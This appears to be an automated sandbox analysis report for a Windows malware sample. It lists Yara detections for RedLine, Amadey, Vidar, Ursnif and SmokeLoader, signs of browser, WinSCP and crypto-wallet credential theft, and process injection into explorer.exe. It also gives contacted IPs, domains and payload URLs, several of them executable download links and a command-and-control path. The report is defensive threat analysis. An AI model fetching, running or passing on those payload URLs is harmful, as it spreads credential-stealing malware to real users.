Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Yara detected Ursnif
Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Yara detected Credential Stealer
Source: Yara match File source: 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR
Yara detected Ursnif
Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 749806 Sample: S2XJ2wbz7u.exe Startdate: 19/11/2022 Architecture: WINDOWS Score: 100 83 lentaphoto.at 2->83 85 2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq 2->85 87 4 other IPs or domains 2->87 103 Snort IDS alert for network traffic 2->103 105 Multi AV Scanner detection for domain / URL 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 14 other signatures 2->109 11 S2XJ2wbz7u.exe 2->11         started        14 tiddsjj 2->14         started        16 rovwer.exe 2->16         started        signatures3 process4 signatures5 149 Detected unpacking (changes PE section rights) 11->149 151 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->151 153 Maps a DLL or memory area into another process 11->153 18 explorer.exe 21 11->18 injected 155 Machine Learning detection for dropped file 14->155 157 Checks if the current machine is a virtual machine (disk enumeration) 14->157 159 Creates a thread in another existing process (thread injection) 14->159 process6 dnsIp7 89 cdn-102.anonfiles.com 195.96.151.51, 443, 49716 UTA-ASAT unknown 18->89 91 cdn-104.anonfiles.com 195.96.151.53, 443, 49741 UTA-ASAT unknown 18->91 93 18 other IPs or domains 18->93 65 C:\Users\user\AppData\Roaming\tiddsjj, PE32 18->65 dropped 67 C:\Users\user\AppData\Local\Temp\8C00.exe, PE32 18->67 dropped 69 C:\Users\user\AppData\Local\Temp\86EE.exe, PE32 18->69 dropped 71 8 other malicious files 18->71 dropped 111 System process connects to network (likely due to code injection or exploit) 18->111 113 Benign windows process drops PE files 18->113 115 May check the online IP address of the machine 18->115 117 4 other signatures 18->117 23 3790.exe 3 18->23         started        28 6CEC.exe 1 18->28         started        30 2B4A.exe 2 18->30         started        32 11 other processes 18->32 file8 signatures9 process10 dnsIp11 101 192.168.2.1 unknown unknown 23->101 81 C:\Users\user\AppData\Local\...\rovwer.exe, PE32 23->81 dropped 133 Detected unpacking (changes PE section rights) 23->133 135 Detected unpacking (overwrites its own PE header) 23->135 137 Machine Learning detection for dropped file 23->137 34 rovwer.exe 18 23->34         started        139 Writes to foreign memory regions 28->139 141 Allocates memory in foreign processes 28->141 143 Injects a PE file into a foreign processes 28->143 39 vbc.exe 28->39         started        41 conhost.exe 28->41         started        145 Multi AV Scanner detection for dropped file 30->145 147 Opens the same file many times (likely Sandbox evasion) 32->147 43 86EE.exe 32->43         started        45 8C00.exe 32->45         started        file12 signatures13 process14 dnsIp15 95 193.56.146.174, 49761, 49762, 49763 LVLT-10753US unknown 34->95 73 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 34->73 dropped 75 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 34->75 dropped 119 Detected unpacking (changes PE section rights) 34->119 121 Detected unpacking (overwrites its own PE header) 34->121 123 Creates an undocumented autostart registry key 34->123 127 2 other signatures 34->127 47 cmd.exe 1 34->47         started        49 schtasks.exe 1 34->49         started        77 C:\Users\user\AppData\Roaming\...\argq.exe, PE32 39->77 dropped 79 C:\Users\user\AppData\Local\...\argq[1].exe, PE32 39->79 dropped 125 Injects a PE file into a foreign processes 43->125 51 86EE.exe 43->51         started        file16 signatures17 process18 dnsIp19 55 conhost.exe 47->55         started        57 cmd.exe 47->57         started        59 cacls.exe 47->59         started        63 4 other processes 47->63 61 conhost.exe 49->61         started        97 t.me 149.154.167.99, 443, 49756 TELEGRAMRU United Kingdom 51->97 99 116.202.5.101, 49759, 80 HETZNER-ASDE Germany 51->99 129 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 51->129 131 Tries to harvest and steal browser information (history, passwords, etc) 51->131 signatures20 process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
43.231.112.109
 hoteldostyk.com Mongolia
63962 ITOOLS-ASiToolsJSCMN true
195.96.151.53
 cdn-104.anonfiles.com unknown
8437 UTA-ASAT true
195.96.151.51
 cdn-102.anonfiles.com unknown
8437 UTA-ASAT true
140.82.121.3
 unknown United States
36459 GITHUBUS false
140.82.121.4
 github.com United States
36459 GITHUBUS false
162.159.133.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false
108.167.141.212
 srshf.com United States
46606 UNIFIEDLAYER-AS-1US true
144.76.136.153
 transfer.sh Germany
24940 HETZNER-ASDE false
89.208.107.216
 unknown Russian Federation
42569 PSKSET-ASRU true
52.217.206.73
 s3-w.us-east-1.amazonaws.com United States
16509 AMAZON-02US false
104.192.141.1
 bitbucket.org United States
16509 AMAZON-02US false
116.202.5.101
 unknown Germany
24940 HETZNER-ASDE false
148.251.234.93
 iplogger.com Germany
24940 HETZNER-ASDE false
195.216.243.155
 u.to United Kingdom
57724 DDOS-GUARDRU false
185.199.108.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS true
193.56.146.174
 unknown unknown
10753 LVLT-10753US false
77.232.37.228
 o36fafs3sn6xou.com Russian Federation
28968 EUT-ASEUTIPNetworkRU true
46.252.148.24
 1ecosolution.it Italy
60087 ASSUPERNOVAIT true
45.154.253.151
 anonfiles.com Sweden
41634 SVEASE true
193.56.146.168
 unknown unknown
10753 LVLT-10753US true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
cdn-102.anonfiles.com 195.96.151.51 true
bitbucket.org 104.192.141.1 true
u.to 195.216.243.155 true
github.com 140.82.121.4 true
raw.githubusercontent.com 185.199.108.133 true
t.me 149.154.167.99 true
cdn.discordapp.com 162.159.133.233 true
o36fafs3sn6xou.com 77.232.37.228 true
anonfiles.com 45.154.253.151 true
svedbergbryanthusnonarithmetical.com 84.21.172.142 true
hoteldostyk.com 43.231.112.109 true
iplogger.com 148.251.234.93 true
s3-w.us-east-1.amazonaws.com 52.217.206.73 true
youtube-ui.l.google.com 172.217.168.14 true
srshf.com 108.167.141.212 true
transfer.sh 144.76.136.153 true
1ecosolution.it 46.252.148.24 true
windowsupdatebg.s.llnwi.net 178.79.225.0 true
cdn-104.anonfiles.com 195.96.151.53 true
bbuseruploads.s3.amazonaws.com unknown unknown
2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq unknown unknown
lentaphoto.at unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://193.56.146.168/mia/solt.exe true
  • Avira URL Cloud: malware
 unknown
https://iplogger.com/2bibu4 false
    		high
    https://raw.githubusercontent.com/decoder1989/Wallet/main/Crypted.exe false
    • Avira URL Cloud: safe
    		 unknown
    http://193.56.146.174/g84kvj4jck/index.php?scr=1 false
    • Avira URL Cloud: malware
    		 unknown
    http://o3b1wk8sfk74tf.com/ true
    • URL Reputation: safe
    		 unknown
    https://bitbucket.org/globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe false
      		high
      https://t.me/deadftx false
        		high
        http://o3npxslymcyfi2.com/ true
        • URL Reputation: safe
        		 unknown
        http://o3l3roozuidudu.com/ true
        • URL Reputation: safe
        		 unknown
        https://cdn-102.anonfiles.com/p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe false
        • Avira URL Cloud: safe
        		 unknown
        https://www.tiktok.com/@user6068972597711 true
        • Avira URL Cloud: safe
        		 unknown